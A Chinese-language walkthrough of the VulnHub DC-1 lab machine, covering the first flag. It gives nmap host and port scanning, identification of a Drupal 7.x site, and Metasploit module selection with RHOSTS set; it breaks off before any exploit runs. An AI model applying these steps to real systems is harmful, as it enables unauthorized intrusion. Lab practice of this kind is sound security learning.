这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。下面就直接开始吧。
Flag--1
ifconfig查kali的本机IP
Nmap 192.168.132.0/24扫描同一网段的存活IP获取目标IP
全面扫描:
Nmap -A 192.168.132.146 -p 1-65535
获取到开放端口22、80、111等
22端口一般思考到ssh远程连接,80端口思考到web网页攻击
且开放HTTP,所以直接访问网页。
根据插件可以看出本站是使用PHP语言编写的开源内容管理系统Drupal搭建的且版本为7.x
国外三大开源php CMS drupal 【无专用扫描器,但是msf内置了模块】 wordpress 【有专用扫描器】 joomla 【有专用扫描器】
进入msf控制台
msfconsole
搜索存在漏洞
search drupal
输入use 序号即可使用
use 1
使用info查看exp的说明
info
修改RHOSTS的值
set RHOSTS 192.168.132.14